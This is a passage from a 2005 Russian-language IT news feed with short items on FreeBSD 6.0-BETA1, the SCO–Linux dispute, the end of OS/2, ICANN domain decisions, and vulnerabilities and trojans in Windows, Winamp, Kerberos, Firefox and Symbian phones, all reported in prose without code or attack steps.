"Информзащита". Как рассказали в МГТС, где решение внедряется с января этого года, оно позволяет на аппаратном уровне достичь скорости шифрования до 10 Гигабит, обладает повышенной степенью надежности, не конфликтует ни с одной известной операционной системой и при этом обладает достаточно дружественным интерфейсом.
Источник

16/07/2005 11:36 FreeBSD 6.0-BETA1
Представлена первая бета-версия первого релиза новой ветки развития открытой операционной системы FreeBSD — 6.0-BETA1. Как сообщает Скотт Лонг (Scott Long), FreeBSD 6.0 станет значительно менее прогрессивным шагом по сравнению с тем, что можно было наблюдать в случае перехода с ветви FreeBSD 4 на FreeBSD 5. Основная часть работы над 6.0 сводится к улучшениям всего, что представлено в 5.x. Изменения затрагивают прямой доступ к устройствам в ядре, предоставляющий многопоточный SMP-надежный слой файловой системы UFS/VFS, возможности WPA и Host-AP 802.11, а также огромное количество исправлений ошибок и улучшений драйверов устройств.
Значительные обновления проведены в управлении питанием и температурой ACPI, ATA, многих аспектах сетевой инфраструктуры, поддержке 32-разрядных приложений для AMD64. Кроме того, FreeBSD 6.0 — первый релиз FreeBSD с экспериментальной поддержкой PowerPC для платформ Macintosh G3 и G4. Официальный анонс выхода FreeBSD 6.0-RELEASE запланирован на 15 августа этого года. Образы ISO с FreeBSD 6.0-BETA1 уже доступны для свободного скачивания всеми желающими.
Nixp.Ru

16/07/2005 10:54 Movable Type ставит заслоны спамерам
Компания Six Apart, разработчик популярной среди блогеров системы управления контентом Movable Type и владелец блог-сервисов Livejournal.com и TypePad, обновляет свою систему до версии 3.2. Пока доступна лишь его бета-версия, к концу месяца появится финальный вариант, снабжённый улучшенными средствами административного управления и контроля над спамом в блогах - нежелательными ссылками, рекламой и прочим мусором, в последнее время ставшим порядочным бедствием для модераторов блогов и форумов. Представители Six Apart утверждают, что их административные средства эффективнее, чем у конкурентов, но это - лишь половина желаемого. Six Apart всё в большей степени ориентируется на корпоративный уровень, и именно с этим связаны все их усилия на данный момент. "Мы на полпути к тому, чего мы хотим", - заявил один из представителей Six Apart. В Movable Type 3.2 будут встроен механизм фильтрации комментариев и trackback-ссылок, аналогичный почтовым противоспамовым фильтрам. Те комментарии, которые система сочтёт "мусором", будут отправляться в соответствующую папку (Junk Folder), оставляя владельцам блогов самим решать, как поступать с этими комментариями и ссылками, и подстраивать ли фильтр под них.
Подробности

16/07/2005 10:25 SCO: "С поличным Linux поймать не удалось"
Неожиданным образом повернулась ситуация с претензиями компании SCO к компании IBM и сообществу open-source. Наружу всплыла переписка между руководителями компании SCO, датированная августом 2002 года, согласно которой ни программистам SCO, ни внешним специалистам так и не удалось найти в исходном коде ОС Linux прямых заимствований проприетарного кода, права на которые так или иначе унаследовала SCO. Письма были опубликованы на сайте Groklaw. В них, в частности, указывается, что для инспекции и сравнения программного кода был привлечён сторонний специалист по имени Боб Суорц, который, потратив длительное время, не нашёл прямых заимствований, от существования которых и отталкивается иск, поданный SCO. "Весь проект [по инспекции кода] стал результатом нежелания руководства SCO верить в то, что Linux и многое из распространяемого под GNU программного обеспечения материализовались без того, что *кто-то кое-где у нас порой* копировал фрагменты проприетарного кода ОС UNIX, копирайт на который принадлежит SCO. Существовала надежда, что мы найдём в коде горячие следы, оставленные Red Hat и/или другими Linux-компаниями, и это даст нам в руки некоторые рычаги для воздействия", - написал один из программистов компании - Майкл Дэвидсон - в своём письме на имя вице-президента компании Рега Брафтона. Однако, как дальше пишет Дэвидсон, попытка ничего не дала: "Мы привлекли стороннего специалиста - поскольку я уже не раз и не два высказывал мнение (основанное на доскональном знании наших собственных исходников и довольно широком знании Linux и других опенсорсных проектов), что мы только зря потратим время и ничего не найдём. По моим оценкам, Боб проработал над этим проектом порядка 4-6 месяцев, и успел за это время прошерстить ядро Linux, большое количество библиотек и утилит, и сравнил их с кодами нескольких различных версий исходников AT&T UNIX... В результате мы не нашли абсолютно ничего, т.е. никаких признаков нарушения копирайта".
Подробнее

15/07/2005 13:26 Удалённая уязвимость в Windows XP SP2
На сайте Security-Protocols.com появилось довольно занятное и одновременно какое-то "мутное" заявление о том, что Windows XP SP2 с полным набором патчей и включённым файрволлом (ICF) обладает уязвимостью, которая может при удалённой атаке вызвать DoS. Об этом сообщил Tom Ferris. Как пишет сам автор, он сообщил Microsoft об этом ещё 5/4/2005 и сейчас работает с корпорацией над устранением уязвимости. Патч должен выйти в августе, а вот эксплоитавтор обещает выпустить во второй вторник августа. В качестве доказательва приводит некий снимок экрана с BSoD системы, сэмулированной в VMware. Имя файла автор затёр.
Подробности

15/07/2005 13:15 Поддержка RSS в Windows: подробности
Разработчики из Microsoft сообщили, что операционная система Longhorn уже поддерживает форматы RSS 0.9x, RSS 1.0, RSS 2.0, а также Atom 0.3 и Atom 1.0. В Microsoft долгое время работает группа, которая занята интеграцией RSS в операционную систему и в браузер. О своих достижениях они поведали на недавней конференции Gnomedex (видеозапись презентации, 58 минут, 258 МБ). После этого на сайте MSDN была опубликована подробная информация о том, как и что именно будет реализовано в Longhorn. Итак, поддержка RSS действительно реализована на уровне операционной системы, так что разработчики смогут легко создавать программы, использующие данную функциональность. Поддержка RSS реализована с учетом особого расширения для RSS, так называемого формата списков Simple List Extensions Specification. Формат списков поддерживает классификацию списков по различным параметрам, а не только по времени создания. Как именно это будет реализовано — мы увидим уже этим летом, когда выйдет первая бета Longhorn.
Подробнее о реализации

15/07/2005 12:34 Уязвимость в Winamp
Leon Juranic из LSS Security Team (Хорватия) сообщил о наличии уязвимости в популярном медиа-плеере Winamp. Уязвимость связана с ошибкой при проверке граничных условий в тэгов ID3v2 и может быть использована для переполнения буфера при обработке специального MP3-файла с длинным строкой в поле "Artist". При переполнении буфера возникает возможность выполнения произвольного кода на уязвимосй системе, однако для этого требуется непосредственное участие пользователя (включение файла в плей-лист с последующим воспроизведением). Уязвимость присутствует в версиях 5.03a, 5.09, 5.091. Производитель обещал в скором времени выпустить обновлённую версию.
Описание

15/07/2005 12:11 IBM прекращает продажи и поддержку OS/2
Компания IBM готовится окончательно прекратить поставки своей операционной системы OS/2, сообщает "Компьюлента". Продвижение системы на рынке прекратится 23 декабря нынешнего года, а стандартная поддержка пользователей будет осуществляться до 31 декабря 2006 года. Для поддержки по истечении этого срока нужно будет заключать особый контракт с IBM. Пользователям при этом предлагается переходить на более современные продукты на платформе Websphere, которые чаще всего работают в среде Linux. Таким образом, история OS/2 подходит к своему завершению. Изначально эта система разрабатывалась совместно IBM и Microsoft для нового поколения персоналок IBM PS/2. Работы велись с 1985 года, а первая версия OS/2 вышла в 1987 г. Однако в 1990 г. отношения между компаниями разладились, и сотрудничеству настал конец. Накопленные наработки Microsoft использовала в Windows NT, а IBM продолжила развивать продукт под маркой OS/2. Последняя, четвертая версия OS/2 Warp вышла в 1996 г., и с ней в IBM связывали достаточно большие надежды на захват доли рынка операционных систем для настольных ПК. Однако успехом новая ОС не пользовалась, во многом из-за отсутствия необходимых программ: офисных пакетов, графических редакторов и т.д. С OS/2 были совместимы только собственные разработки IBM, прочие поставщики ПО ориентировались на Windows. Поддержки 32-разрядных приложения для Windows в OS/2 не было, а 16-разрядные программы для Windows 3.1 стремительно сходили со сцены.
Пресс-релиз

15/07/2005 11:57 Новый сервис ZombieAlert обнаруживает компьютеры-зомби
Компания Sophos, разработчик антивирусного ПО, запустила услугу ZombieAlert - новый сервис оповещения, который обнаруживает в корпоративной сети так называемые компьютеры-зомби. Это зараженные машины, предоставляющие неограниченный доступ для неавторизованных и удаленных пользователей, а попросту - хакеров. С помощью компьютеров-зомби злоумышленники могут рассылать спам или осуществлять скоординированные DoS-атаки на различные веб-сайты. Сервис ZombieAlert извещает своих абонентов тогда, когда с одного из компьютеров их сети были отправлены спамерские сообщения, которые впоследствии были зарегистрированы одной из ловушек сети Sophos по отлову спама. Служба также мгновенно оповещает своих пользователей, если их IP-адрес был занесен в "черный список" DNS (DNSBL). Эта информация помогает подписчикам своевременно обнаружить угрозы, вылечить и защитить корпоративные сети от дальнейших атак.
Подробнее о сервисе

15/07/2005 10:55 Ошибки в Kerberos делают приложения уязвимыми
После обнаружения двух слабых звеньев в бесплатной технологии аутентификации сигналы об опасности поступают, кажется, отовсюду, кроме Редмонда. Серьезные пробелы в защите популярной технологии сетевой аутентификации ставят под угрозу множество программных продуктов. Они позволяют злоумышленникам вывести из строя приложения или проникнуть в компьютеры, использующие спецификацию Kerberos, разработанную в Массачусетсском технологическом институте. В двух предупреждениях, распространенных во вторник, MIT оценивает обе уязвимости как «критические». Университет предложил поправки для устранения проблем и утверждает, что злоумышленникам «должно быть трудно» воспользоваться этими ошибками. Несколько производителей ПО уже выпустили обновления к своим продуктам. Так, Red Hat, Turbolinux и Gentoo предложили патчи для собственных версий Linux. Sun во вторник разослала два предупреждения, в которых признает, что несколько версий Solaris уязвимы, но патчей пока не предложила. В силу широкой популярности Kerberos, в ближайшее время, вероятно, и другие производители выпустят секьюрити-бюллетени, полагает Брайан Грейк, главный технолог компании Preventsys, специализирующейся на анализе уязвимостей: «Думаю, что мы увидим целый поток патчей». Microsoft тоже использует Kerberos, но собственную версию, на которую эти ошибки не влияют. По данным MIT, оба бага относятся к Kerberos 5 Release 1.4.1, а также более ранним версиям ПО. Независимая компания по секьюрити-мониторингу Secunia оценивает проблемы как «высококритичные» — это второй наиболее серьезный уровень опасности по ее шкале. FrSIRT оценивает баги как «критичные» по самому высокому уровню. Грейк согласен, что уязвимости серьезны, но отмечает, что использовать их для атак нелегко. «Требуется очень много знаний, чтобы превратить эти уязвимости в эксплойты», — сказал он.
Подробности

15/07/2005 10:22 ООН разработала 4 сценария коллективного управления Интернетом
Специальная комиссия ООН по Интернету представила в четверг четыре возможных сценария управления функциональностью глобальной сети с помощью международных организаций, сообщает AP. Эти проекты будут представлены главам государств на всемирном саммите "Информационное общество", который должен пройти в ноябре в Тунисе. В последние годы высказываются разные мнения о том, каким именно образом должно осуществляться управление Интернетом. Представителей многих стран устраивает существующая ситуация, когда главным регулирующим органом является некоммерческая организация ICANN, состоящая из международных представителей и принимающая решения в совещательном порядке. Однако в ряде стран полагают, что функции ICANN, главным образом сводящиеся к управлению системой доменных имен и распределению блоков IP-адресов, должны быть переданы какой-либо организации под эгидой ООН (например, Международному союзу электросвязи ITU), чтобы обеспечить более активное участие развивающихся стран в управляющей деятельности. ICANN также периодически критикуют за проявления предвзятости, необоснованные попытки расширить полномочия и раздутый бюджет. На прошлом саммите по информационному обществу мировые лидеры не смогли выработать единую точку зрения по поводу альтернативных вариантов интернет-управления, после чего для работы с этим вопросом была создана комиссия ООН. Отмечается, что ее члены также высказывают разные точки зрения, но все сходятся во мнении, что ни одна страна не должна играть доминирующую роль.
Подробности

14/07/2005 17:35 Уязвимость в Windows
Как сообщаеn Secunia, обнаружена уязвимость в семейтве ОС Windows (2K и XP - версий). Уязвимость связана с ошибкой при обработке большого целого значения, которое может быть передано библиотеке netman.dll в качестве параметра. Это может привести к DoS Network Connections Service. Необходимо отметить, что уязвимость носит локальный характер и пристуствует на полнопатченных системах Win2K с SP4 и WinXP c SP2. Уязвимость в других системах не исключается.
Описание

14/07/2005 17:03 IT-менеджеры не представляют уровня хакерской угрозы
60 процентов IT-менеджеров не располагают средствами для точной оценки уровня угрозы, который хакеры представляют для их систем. Это обстоятельство выяснилось во время опроса «Тенденции в управлении рисками и уязвимостями», проведенного компанией nCircle, сообщает сайт vnunet.com. 60 процентов 1700 опрошенных менеджеров признались, что не умеют создавать отчеты об уязвимостях своих сетей по регионам или бизнес-подразделениям. Половина опрошенных призналась, что не может выполнять требования политики внутренней безопасности компании. 50 процентов респондентов отметили, что их компаниям требуется более месяца, чтобы собрать информацию для подготовки отчета о соответствии требованиям безопасности. «Мы провели это исследование, чтобы лучше понять, как представители бизнеса видят риски сетевой безопасности, и как они ими управляют. Результаты исследования выявляют потребность в значительном количестве компаний, которые смогут внедрить решения и процессы для эффективного измерения рисков, управления этими рисками и, в конечном счете, их снижения», — заявила представительница nCircle.
Источник

14/07/2005 16:41 AMD обвинила Intel в саботаже
По словам представителей компании, компиляторы Intel намеренно сделаны таким образом, чтобы ухудшить производительность производимых с их помощью программ, в случае, если они запускаются на процессорах AMD. Этот эффект, как утверждает компания AMD, достигается за счет введения в компилируемый код "альтернативных путей кодирования", когда программа работает по оптимальному пути только на процессорах Intel. Выбор кода определяется на основании данных, полученных из переменной CPUID, используемых для идентификации микропроцессоров разных производителей, сообщает The Register со ссылкой на дискуссию, разгоревшуюся на ресурсе Slashdot.
Дискуссия

14/07/2005 16:27 Новый плагин для MS IE упрощает поиск
Компания Browster выпустила бесплатный штепсель для браузера Internet Explorer. Установив и настроив программу, пользователь получает возможность просматривать содержимое поисковой выдачи, не открывая интересующую его страницу. Предварительный просмотр осуществляется путем наведения указателя мыши на нужную ссылку. Подведя мышку к ссылке, пользователь видит содержимое страницы в новом окне. Не нашли то, что искали? Крутим колесико вертикальной прокрутки и открываем все в том же "плавающем" окне копии следующих страниц из поисковой выдачи. Browster 1.0, как пишет CNET, работает с ведущими поисковиками, вроде Yahoo и Google, магазинами, вроде eBay и Amazon.com, и другими сайтами, поддерживающими функции внутреннего поиска. Плагин поддерживает браузеры версии MS IE 5 и старше. Возможно, что в будущем появится поддержка и других браузеров.
Подробности

14/07/2005 15:56 Microsoft награждает "стукачей" на вирусописателей
Корпорация Microsoft объявила о выплате денежного вознаграждения в размере $250 тыс. двум гражданам, которые помогли установить личность создателя известного сетевого червя Sasser. Автор вируса, арестованный в мае 2004 года, в минувшую пятницу (8 июля) был признан виновным судом Вердена, Германия, и приговорен к одному году и девяти месяцам лишения свободы условно. Вознаграждение будет выплачено из фонда программы Microsoft Antivirus Reward, созданной в ноябре 2003 года совместно с Интерполом, Федеральным Бюро Расследований и Секретной службой Министерства финансов США. Программа призвана побуждать людей к оказанию помощи по выявлению ответственных за создание и распространение вредоносных червей и вирусов в сети интернет, таким образом, предотвращая киберпреступления. Вознаграждение выплачивается любому, кто не связан с криминальной деятельностью и предоставляет сотрудникам правоохранительных органов достоверную информацию, которая помогает задержать правонарушителей и доказать их вину.
Источник

14/07/2005 15:31 В продуктах Microsoft найдены опасные уязвимости
Сообщается о наличии уязвимости в Microsoft Windows, которая позволяет удаленному пользователю выполнить произвольный код на целевой системе. Уязвимость в модуле Color Management вызывает ошибку при обработке тэгов форматирования в ICC-профиле. Удаленный пользователь может создать специально сформированный графический файл и выполнить произвольный код на целевой системе с привилегиями текущего пользователя. Уязвимы ОС Windows 98, 2000, XP и 2003. Уязвимости присвоен рейтинг опасности «критическая». Кроме того, в Microsoft Word найдена «дыра», вызывающая переполнение буфера при обработке шрифтов. Уязвимы Microsoft Office 2000, XP; Microsoft Works Suite 2000, 2001, 2002, 2003, 2004. Удаленный пользователь может создать специальным образом Word-документ, вызвать переполнение стека и выполнить произвольный код на целевой системе с привилегиями пользователя, открывшего файл. Уязвимости присвоен рейтинг опасности «высокая».
Подробности

14/07/2005 14:23 Выход Firefox 1.0.5
Mozilla объявила о выходе новой версии своего браузера Firefoox. Улучшения в системе безопасности закрывают уязвимость браузера, которая может позволить злоумышленнику выполнить проивзольный код на уязвимой системе. Уязвимость существует из-за недостаточной обработки клонированных объектов. Удаленный пользователь может с помощью специально сформированного сценария выйти за пределы песочницы браузера, получить доступ к привилегированным объектам и выполнить произвольный код на системе с привилегиями текущего пользователя. Удаленный пользователь может создать специально сформированную HTML страницу, которая обращается к внешнему приложению (Flash Player or QuickTime player) и затем с помощью 'javascript:' и 'chrome:' URL выполнить произвольный код на целевой системе, сообщает SecurityLab.
Подробнее о релизе

14/07/2005 13:49 Sun откроет единую точку входа
Sun Microsystems планирует предоставить сообществу open source часть документации по своему продукту единой точки входа (single sign-on) Java Access Manager. В среду представители Sun сообщили, что компания откроет исходный код своей веб-технологии аутентификации и единой точки входа в рамках нового проекта Open Web Single Sign-On (Open SSO). Релиз будет включать также программный интерфейс для Sun Java System Web Server и Sun Java System Application Server. Единая точка входа облегчает пользователям регистрацию в нескольких веб-приложениях, предлагая общий логин/пароль, и упрощает управление паролями в организации. Код, выпускаемый Sun, обеспечивает единую точку входа только внутри одной организации; он не поддерживает объединения между организациями. По словам вице-президента Sun по управлению электронными удостоверениями (identity management) Сары Гейтс, публикация исходного кода Sun позволит разработчикам Java-ПО на предприятиях или софтверным компаниям обеспечить поддержку технологии единой точки входа в своих приложениях. «Мы предоставляем разработчикам эту веб-технологию аутентификации и единой точки входа, чтобы им не приходилось создавать ее самостоятельно».
Источник

14/07/2005 13:34 Мининформсвязи разработало правила сохранения телефонного номера при смене оператора
Министерство информационных технологий и связи РФ разработало два документа, регламентирующих перенос абонентского мобильного телефонного номера из одной сотовой сети в другую. Как сообщили в министерстве агентству "Росбалт", проекты документов получили названия "Основные положения по взаимодействию абонента и оператора подвижной радиотелефонной связи при переносе абонентского номера" и "Техническое решение по организации переносимости абонентских номеров". В первом проекте указывается порядок взаимодействия абонента и оператора при переносе абонентского номера. Предполагается, что меняющий оператора при условии сохранения номера абонент будет обращаться с соответствующим заявлением, проектами инструкций определяются процедуры переноса и условия, при которых в переносе может быть отказано.
Источник

14/07/2005 09:38 Новый Flash-плеер доступен для бета-тестирования
Спустя три месяца после обещания внести серьезные изменения в свое ПО веб-анимации, Macromedia выпустила открытую тестовую версию нового Flash-плеера. Во вторник Macromedia опубликовала первую открытую бета-версию плеера Flash 8 с кодовым названием Maelstrom. «Это предварительная версия следующего важного релиза Flash Player, — сказано на веб-сайте компании. — Она доступна разработчикам и конечным пользователям для проверки правильности воспроизведения существующего контента и отсутствия проблем совместимости… Помогите нам, пожалуйста, сделать этот релиз максимально качественным. В случае каких-либо проблем просим сообщить нам о них как можно быстрее». В интервью один из топ-менеджеров Macromedia подчеркнул важность обратной совместимости между тестируемым плеером и существующим Flash-контентом. «Мы хотим, чтобы тысячи людей загрузили эту версию и в процессе веб-серфинга следили за тем, все ли в порядке, — сказал исполнительный вице-президент и генеральный менеджер Macromedia Дэвид Мендельс. — Главная задача Flash-плеера заключается в том, чтобы как следует воспроизводить контент, который вы находите в вебе. И мы не хотим, чтобы что-то нарушалось».
Подробности

14/07/2005 09:20 Власти Львовской области ищут создателей антиукраинской компьютерной игры
Власти западных областей Украины намерены запретить продажу компьютерной игры "Операция Галичина", а также разыскать и привлечь к ответственности ее разработчика. Об этом сообщило во вторник агентство ИТАР-ТАСС со ссылкой на администрацию Львовской области. "Игра, в которой российский спецназ убивает галичанина, "стала настоящим шоком для местных чиновников", сообщили ИТАР-ТАСС источники во властных структурах этого украинского региона. "Игрокам предлагается ощутить себя бойцами российского спецназа, засланными для наведение порядка на Западной Украине. Сюжет разворачивается в 2008 году, когда "на президентских выборах в Украине побеждает пророссийский кандидат Сергей Гришков", говорится в сообщении агентства. Также сообщается: "Традиционно, западные области не признают результатов выборов и грозят, что не будут подчиняться новому президенту; Украина обращается к России с просьбой помочь восстановить территориальную целостность страны. Прибывший спецназ находит и уничтожает базы боевиков". Кроме того, в сообщении поясняется: "Реклама компьютерной игры размещена на сайте украинской студии "Эдем" из Днепропетровска, где указывается, что производителем является компания NeoGame. Однако никому с владельцами этой компании связаться пока не удается. Тем временем диск с игрой активно распродается". Антиукраинская тематика, по всей видимости, была внедрена в игру производителями контрафакта, в больших количествах базирующимися на Украине и в других странах СНГ. Методика распространения нелегально модифицированной игры позволяет предположить, что ее разработчики подразумевали преднамеренную провокацию и заблаговременно приняли меры для того, чтобы их личности не были установлены.
ИТАР-ТАСС

12/07/2005 12:14 Уязвимость в MSN Messenger позволяет прервать конференцию
Обнаружена уязвимость в MSN Messenger, которая позволяет удаленному пользователю прервать конференцию. Удаленный пользователь может послать сообщение, содержащее слово .pif, что приведет к отключению от сервера всех участников конференции. Соответствующего эксплойта пока нет, также, как и способов устранения проблемы.
Источник

12/07/2005 12:09 Вирус, вызывающий "истощение" телефонов
Антивирусная фирма F-Secure сообщила о появлении новой троянской программы для смартфонов Nokia, основанных на программной платформе Symbian Series 60. Как сообщается, Trojan Doomboot.A можно "подхватить" при загрузке игр с бесплатных сайтов. После инсталляции инфицированной игры единственное проявление деятельности вируса, по которому можно определить факт заражения - быстрая, в течение часа, разрядка аккумулятора. Вирус "сажает" батарею, непрерывно рассылая самого себя посредством MMS и Bluetooth. Обнаружив троянца, его необходимо удалить его через диспетчер приложений.
Источник

12/07/2005 11:42 Одобрено создание домена для мобильных устройств
Международная организация ICANN (Internet Corporation for Assigned Names and Numbers), ведающая распределением доменных имён в интернете, одобрила создание нового домена верхнего уровня .mobi. Предполагается, что веб-сайты, размещенные в домене .mobi, будут специально адаптированы для просмотра на небольших экранах портативных устройств, в том числе смартфонов и мобильных телефонов. При разработке таких интернет-ресурсов будут учитываться ограниченные аппаратные возможности коммуникаторов и карманных компьютеров, а также относительно небольшая пропускная способность каналов связи. На необходимости введения отдельной доменной зоны для портативных устройств настаивали такие крупные компании и организации, как Microsoft, Ericsson, Nokia, Samsung, T-Mobile, Vodafone, Telefonica Movilies, Hutchison 3 и Ассоциация GSM. Распространение веб-сайтов в домене .mobi должно стимулировать увеличение спроса на мобильные телефоны с расширенными мультимедийными возможностями, а, соответственно, и рост доходов производителей оборудования и операторов сотовой связи, сообщает NewsFactor. Первые имена в зоне .mobi, как ожидается, будут зарегистрированы в начале будущего года.
Источник

12/07/2005 11:26 Отчет: Акт Сарбанеса-Оксли может навредить безопасности
Многомиллиардные расходы, связанные с выполнением требований Акта Сарбанеса-Оксли, ослабляют внимание компаний по отношению к соблюдению других мер безопасности, утверждают авторы нового отчета. В понедельник международная секьюрити-ассоциация Information Security Forum (ISF) заявила, что по ее подсчетам многие из членов этой организации, чтобы выполнить требования Акта Сарбанеса-Оксли (SOX), израсходуют на системы информационной безопасности свыше $10 млн. Членами ISF являются MetLife, CitiGroup, Electronic Data Systems и Safeway. Консультант ISF Энди Джоунс говорит, что хотя SOX нацелен на повышение качества корпоративного управления и учета, этот закон оказался трудным для понимания специалистами по информационной безопасности. «Так как ни в самом законодательном акте, ни в официальных разъяснениях к нему не присутствует выражение „информационная безопасность”, роль, которую этот документ играет в политике безопасности, и необходимые для его исполнения средства защиты приходится определять самим организациям в контексте собственного бизнеса», — поясняет он. ISF предупреждает, что SOX игнорирует чрезвычайно важные проблемы безопасности, связанные с риском потери информации, такие как непрерывность бизнеса и послеаварийное восстановление. Поэтому важно соответствовать более широкому набору требований ИТ-безопасности и стратегии корпоративного управления. Джоунс предупредил также, что SOX может отвлекать внимание от более серьезных рисков для безопасности: «Для тех организаций, бизнес которых напрямую не связан с финансами, например, промышленных предприятий или сферы услуг, отвлечение внимания на обеспечение соответствия SOX в ущерб другим областям информационной безопасности может привести к пренебрежению серьезными бизнес-рисками».
Подробности

12/07/2005 10:45 ЕС ограничит ТВ-вещание в Интернете
Европа впервые собирается заняться регулированием Интернета посредством введения правил, покрывающих ТВ-вещание в сети, пишет The Times. Во вторник в Брюсселе будут обсуждаться вопросы благопристойности, точности и беспристрастности интернет-телевидения. Как предполагается, комиссар ЕС по информационным технологиям и СМИ Вивьен Рединг (Viviane Reding) представит ряд соответствующих документов, в которых обосновывается необходимость внесения наиболее масштабных с 1989 года поправок в свод правил для европейских телеканалов, а также необходимость законодательной регуляции "нелинейного аудио-визуального контента". Обсуждаемые во вторник предложения, как отмечает издание, будут направлены для ознакомления компаниям, занимающимся ТВ-вещанием в Интернете. Как ожидается, проект правил, регулирующих интернет-телевидение, будет выработан до конца 2005 года.
Источник

11/07/2005 13:41 Официальная русская версия Corel DRAW GS 12
"Компания Си-Пи-Эс", которая представляет продукт, не планирует проводить специальных пресс-конференций или других мероприятий специально для представителей прессы. Состоится лишь официальная презентация для партнеров. Мероприятие 19 июля будет носить исключительно партнёрский характер и не заменяет собой специальные мероприятия для представителей прессы, отмечается в пресс-релизе. Представители корпорации COREL специально приезжают в Россию, чтобы представить русскую версию этого флагманского продукта, а также ответить на вопросы своих партнеров. Презентация состоится в Центре международной торговли.
Источник

11/07/2005 13:08 Широкополосный доступ стал стандартом
Повсеместное распространение широкополосного доступа — одна из самых ярких тенденций последних лет. Некоторые эксперты считают, что время бурного роста уже подошло к концу. По мнению аналитиков компании iSuppli, после рекордного для индустрии 2004-го года количество широкополосных подключений уже не будет расти такими темпами. В IV кв. 2004 г. количество абонентов широкополосного доступа в мире увеличилось на 13,8 млн человек и достигло 141,3 млн. Это на 52% больше, чем годом ранее (93,3 млн). Как считают эксперты iSuppli, прошлый год так и останется рекордным. Уже сейчас темпы роста абонентской базы заметно снизились. По итогам текущего года ожидается рост всего на 31%, в следующем году — на 24%, а в последующие годы — на 18%, 14% и 12%, соответственно. Таким образом, к 2009 г. количество абонентов во всем мире составит около 349,1 млн человек. «Широкополосный доступ начинает достигать уровня насыщения во многих развитых странах мира, из-за чего наблюдается замедление темпов роста абонентской базы», — объясняет Стив Раго (Steve Rago), ведущий аналитик по сетям и оптическим комуникациям iSuppli. По его словам, в ближайшие несколько лет увеличение количества абонентов будет достигаться в основном за счет Китая и других развивающихся стран.
Подробности

11/07/2005 11:56 Томского хакера приговорили к 1,5 годам
Житель Томской области приговорен к 1,5 годам лишения свободы условно за компьютерное пиратство. Как сообщили РБК в Управлении информации и общественных связей Генеральной прокуратуры РФ, Александр Светличный был признан виновным в нарушении авторских прав и неправомерном доступе к компьютерной информации. Следствие установило, что Светличный в нарушение порядка, предусмотренного законом, приобрел, взломал и распространял за деньги путем копирования программный продукт, предназначенный для профессионального проектирования мебели. Стоимость лицензионного экземпляра этой программы превышает 50 тыс. руб. В ходе расследования уголовного дела установлен и подтвержден, в частности, факт модификации программы при помощи специфического электронного ключа, который позволил хакеру бесплатно пользоваться компьютерным средством проектирования, имеющим несколько степеней защиты. Светличный был признан виновным по ст.146 (нарушение авторских прав) и ст.272 (неправомерный доступ к компьютерной информации) Уголовного кодекса РФ. Ему назначено наказание в виде 1 года 6 месяцев лишения свободы условно с испытательным сроком 6 месяцев, отметили в прокуратуре.
РБК

11/07/2005 11:43 Взрывы в Лондоне обернулись эпидемией троянов
Злоумышленники в интернете не преминули воспользоваться повышенным интересом мировой общественности к взрывам в Лондоне и устроили широкомасштабную рассылку троянских программ. В интернете обнаружена троянская программа, которая использует интерес людей к взрывам в Лондоне, унесшим жизни, по крайней мере, 49 человек. Пользователям рассылается электронное письмо со ссылкой на любительскую видеосъемку последствий взрыва бомбы в столичной подземке. При попытке открыть вложенный в письмо файл на компьютер устанавливается программа-троян. При запуске вложение копируется в файл /Windir/winlog.exe и изменяет раздел реестра HKLM/Software/microsoft/Windows/CurrentVersion/Run таким образом, чтобы оно автоматически выполнялось каждый раз во время загрузки Windows. Затем троян пользуется зараженным компьютером и серверами SMTP для рассылки огромного количества спама. Согласно информации английской компании MessageLabs, занимающейся проблемами сетевой безопасности, данное письмо — это фальшивый новостной html-бюллетень с темой «TERROR HITS LONDON» — «Террор обрушивается на Лондон». В электронном письме пользователям предлагается «просмотреть уникальные кадры из любительской видеосъемки». Файл называется «London Terror Moovie.avi» и выглядит как обычный видеоклип, однако на самом деле имеет расширение .exe, отделенное от ложного 124 пробелами. Кроме того, для маскировки также сообщается, что файл «проверен антивирусом Norton Antivirus.exe». Мошенники не удосужились даже вставить в графу «отправитель» реальный адрес CNN. Вместо этого они указали адрес breakingnews@CNNonline.com, который принадлежит не CNN, а некоей компании во Флориде. Однако далеко не все пользователи об этом догадались, многие запустили файл.
Источник

11/07/2005 11:30 Шпионские и рекламные программы меняют онлайновые привычки американцев
Последнее исследование Pew Internet and American Life Project показало, что онлайновые привычки взрослых американцев в последнее время претерпели сильные изменения, сообщает Associated Press. Это обусловлено большим количеством шпионских и рекламных программ, которые самоустанавливаются без ведома пользователей при посещении некоторых сомнительных сайтов. К числу подобных ресурсов, в основном, причисляются веб-сайты для взрослых и геймеров, а также пиринговые сети. Ввиду этого автором исследования Сьюзан Фокс отмечено, что большинство американцев изменили свою манеру поведения в онлайне. Большинство из них отказались от посещения ряда ресурсов, которые, по их мнению, могут содержать зловредные программы. Фокс заметила, что зачастую люди не чувствуют себя свободно в виртуальном мире, опасаясь за безопасность своих компьютеров. Тем самым, они отказываются от того, что они хотели бы делать в Сети. Исследование Фокс проводилось с 4 мая по 7 июня. В рамках него по телефону был опрошен 2001 человек. Полученные данные свидетельствуют о том, что 48% американцев отказались от посещения некоторых веб-сайтов, а 25% перестали пользоваться файлообменными сетями. 18% респондентов сообщили, что отказались от использования браузера Internet Explorer и перешли на Mozilla Firefox. 81% опрошенных стали осмотрительнее относиться к электронной корреспонденции, которая приходит в их почтовые ящики. Они перестали открывать прикрепленные файлы подозрительных писем, опасаясь заразить свои машины вирусами. А 91% американцев отметили, что онлайновые угрозы повлекли за собой перемены в их онлайновом поведении.
Источник

11/07/2005 10:59 ICANN ликвидирует потолок цен на домены .net
Владельцам веб-адресов .net грозит повышение регистрационной платы — но не раньше 2007 года. В прошлом месяце некоммерческая организация Internet Corporation for Assigned Names and Numbers, ответственная за интернет-адреса, при возобновлении контракта с VeriSign на ведение главной базы данных доменных имен .net решила втихомолку снять ограничения с оптовых цен на регистрацию адресов в домене .net. До недавнего времени этот факт, скрытый за мелким шрифтом, оставался незамеченным. И только в последние дни новость о переменах распространилась по интернету. «Этот шаг может сигнализировать о намерении ICANN отказаться от регулирования цен на регистрацию доменных имен», — указывает поставщик интернет-услуг Netcraft. ICANN ограничивала плату за имена в домене .net на уровне $6 или $4,25, в зависимости от типа адреса. По новому шестилетнему контракту с VeriSign потолок составляет $4,25 и действует по 31 декабря 2006 года, а затем все ограничения снимаются. Представитель VeriSign сообщил Computer Business Review, что его компания вряд ли поднимет цены, а если и сделает это, то лишь для того, чтобы инвестировать в собственную инфраструктуру. Главный регистратор обязался предупреждать о любом повышении цен за шесть месяцев, отмечает Netcraft. Для более популярного реестра .com, который также контролирует VeriSign, 